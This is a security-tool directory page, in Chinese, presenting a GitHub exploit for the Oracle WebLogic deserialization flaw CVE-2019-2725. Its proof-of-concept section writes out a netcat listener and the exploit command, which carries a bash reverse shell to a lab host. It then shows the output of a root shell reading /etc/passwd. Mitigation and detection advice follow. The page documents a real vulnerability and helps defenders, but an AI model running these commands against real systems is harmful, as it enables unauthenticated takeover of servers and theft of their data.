Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725 — 针对 Oracle WebLogic Server (CVE-2019-2725) 的未认证远程代码执行漏洞利用,通过 AsyncResponseService 中的反序列化,利用精心构造的 SOAP 请求传递反弹 shell。 | Kitploit
工具/GitHubGitHub/loursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubloursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725

Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725

针对 Oracle WebLogic Server (CVE-2019-2725) 的未认证远程代码执行漏洞利用,通过 AsyncResponseService 中的反序列化,利用精心构造的 SOAP 请求传递反弹 shell。

查看仓库
27个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-2725 – Oracle WebLogic 未认证远程代码执行

Oracle Fusion Middleware 的 Oracle WebLogic Server 组件中存在漏洞(子组件:Web Services)。受影响的受支持版本为 10.3.6.0.0 和 12.1.3.0.0。该漏洞易于利用,允许未经认证的攻击者通过网络访问 HTTP 来危害 Oracle WebLogic Server。

漏洞概述

CVE ID: CVE-2019-2725
严重性: 严重(CVSS v3:9.8)
漏洞类型: 未认证远程代码执行(RCE)
受影响产品: Oracle WebLogic Server
受影响组件: AsyncResponseService
是否需要认证: 否
是否需要用户交互: 否

CVE-2019-2725 是 Oracle WebLogic Server 中的一个关键反序列化漏洞,允许未经认证的远程攻击者通过向 /_async/AsyncResponseService 端点发送特制的 SOAP 请求来执行任意系统命令。


受影响版本

2019 年 4 月关键补丁更新之前的 Oracle WebLogic Server 版本,包括但不限于:

  • WebLogic 10.3.6
  • WebLogic 12.1.3
  • WebLogic 12.2.1.3

漏洞描述

该漏洞由于 AsyncResponseService 中的不安全反序列化而存在。
攻击者可以发送恶意的 XML 负载,导致在底层操作系统上无需认证即可执行任意命令。

此问题特别危险,因为:

  • 该端点通常暴露在外部
  • 无需有效凭证
  • 利用直接导致系统完全沦陷

攻击场景

  1. 攻击者识别出暴露的 WebLogic 实例
  2. 攻击者向以下地址发送恶意 SOAP 请求:
  3. WebLogic 反序列化攻击者控制的数据
  4. 执行任意操作系统命令
  5. 攻击者获得远程 shell 访问

概念验证(PoC)

🔹 攻击者监听端(第二个 CLI)

启动一个 Netcat 监听器以接收反弹 shell:

root@kitploit:~
nc -lvp 2323

🔹 漏洞利用执行(第一个 CLI)

针对易受攻击的 WebLogic 服务器运行漏洞利用脚本:

root@kitploit:~
python3 CVE-2019-2725.py http://172.17.0.6:7001/_async/AsyncResponseService '/bin/bash -i >& /dev/tcp/172.17.0.10/2323 0>&1'

预期输出:

root@kitploit:~
[+] Target appears VULNERABLE
[*] Sending payload...
[+] Payload delivered successfully (HTTP 202)

🔹 成功利用结果

在 Netcat 监听器上,接收到反弹 shell:

root@kitploit:~
Listening on 0.0.0.0 2323
Connection received on 172.17.0.6 39926
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# whoami
root
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# pwd
/root/Oracle/Middleware/user_projects/domains/base_domain
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

缓解与修复措施

推荐操作

  1. 应用 Oracle 2019 年 4 月关键补丁更新(CPU)
  • 将 Oracle WebLogic Server 升级到包含 2019 年 4 月安全修复的版本,这些修复由 Oracle https://www.oracle.com/security-alerts/alert-cve-2019-2725.html 提供
  1. 限制对易受攻击端点的访问
  • 这确认了远程命令执行和系统级访问。
  • 确保此端点不会暴露给不受信任的网络
  • 仅限制对内部或受信任 IP 范围的访问
  1. 使用网络控制阻止不受信任的访问
  • 实施严格的防火墙规则
  • 通过反向代理强制执行访问控制
  • 禁用对 WebLogic 管理和异步服务的不必要外部访问
  1. 启用日志记录和持续监控
  • 监控 HTTP 访问日志
  • 针对针对异步端点的异常请求模式发出警报

检测指标

以下指标可能表明尝试或成功利用了漏洞:

🔍 网络和应用层指标

  • 针对以下地址的请求:
  • 可疑或格式错误的 SOAP/XML 负载
  • 来自异步服务的重复 HTTP 202 Accepted 响应

🔍 主机层面指标

  • WebLogic Server 发起的出站网络连接
  • 意外的 shell 执行,例如:
  • /bin/bash
  • /bin/sh
  • 向未知 IP 或端口创建反弹 shell 连接

安全监控建议

  • 为已知的 WebLogic SOAP 利用模式启用 IDS/IPS 签名
  • 监控来自 WebLogic 服务器的出站流量
  • 为应用服务实施最小权限执行
  • 定期审查 WebLogic 进程执行日志

致谢

以下公开仓库被参考用于漏洞利用的理解和验证:

  • https://github.com/lufeirider/CVE-2019-2725
  • https://github.com/pimps/CVE-2019-2725

下载工具